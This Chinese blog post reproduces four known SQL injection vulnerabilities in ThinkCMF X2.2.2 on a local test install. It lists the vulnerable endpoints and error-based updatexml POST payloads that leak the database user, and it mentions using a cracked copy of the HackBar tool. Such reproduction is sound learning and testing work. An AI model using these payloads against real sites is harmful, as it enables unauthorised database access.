美文网首页
ThinkCMF X2.2.2多处SQL注入漏洞复现

ThinkCMF X2.2.2多处SQL注入漏洞复现

作者: 有时右逝 | 来源:发表于2019-07-21 21:47 被阅读0次

    前言

    对网络安全恋恋不忘,于是周末又折腾了一遍。作为初学者,挖洞是不敢想的,只能找别人写过的漏洞复现下。特此记录。

    漏洞说明

    ThinkCMF是一款基于ThinkPHP+MySQL开发的中文内容管理框架,其中X系列基于ThinkPHP 3.2.3开发,最后更新到2.2.2版本。

    存在多个漏洞。这里复现了全部。

    工具

    hackbar
    谷歌浏览器
    火狐浏览器
    xdebug

    复现过程

    • 构建环境。
      下载地址如下:
      https://github.com/thinkcmf/cmfx/releases
      安装后如下图。

      image.png
    • 安装hackbar
      这里最主要的工具是它。该工具最新版需要收费。建议安装低版本或者使用破解的。

    这里我选择了破解。

    破解思路:


    image.png
    • 漏洞1
    http://127.0.0.1/cmfx/index.php?g=portal&m=article&a=edit_post
    
    POST: post[id][0]=bind&post[id][1]=2 and updatexml(1, concat(0x7e,user(),0x7e),1)-- -
    
    
    

    前台文章编辑处存在漏洞。构造下面的请求即可。

    image.png
    • 漏洞2

    后台管理那里,幻灯片的删除存在漏洞。

    http://127.0.0.1/cmfx/index.php?g=Admin&m=slide&a=delete
    
    POST: ids[]=1&ids[]=0 and updatexml(1, concat(0x7e,user(),0x7e),1)
    
    image.png
    • 漏洞3
      导航编辑
    http://127.0.0.1/cmfx/index.php?g=Admin&m=nav&a=edit_post
    
    POST: parentid=1 and updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)
    
    image.png
    • 漏洞4
      评论审核那里
    http://127.0.0.1/cmfx/index.php?g=Comment&m=commentadmin&a=check&check=1
    
    POST:  ids[]=1&ids[]=2 and updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)
    
    image.png
    • 相关文章

    https://blog.csdn.net/weixin_33924770/article/details/86031193

    相关文章

      网友评论

          本文标题:ThinkCMF X2.2.2多处SQL注入漏洞复现

          本文链接:https://www.haomeiwen.com/subject/uinvlctx.html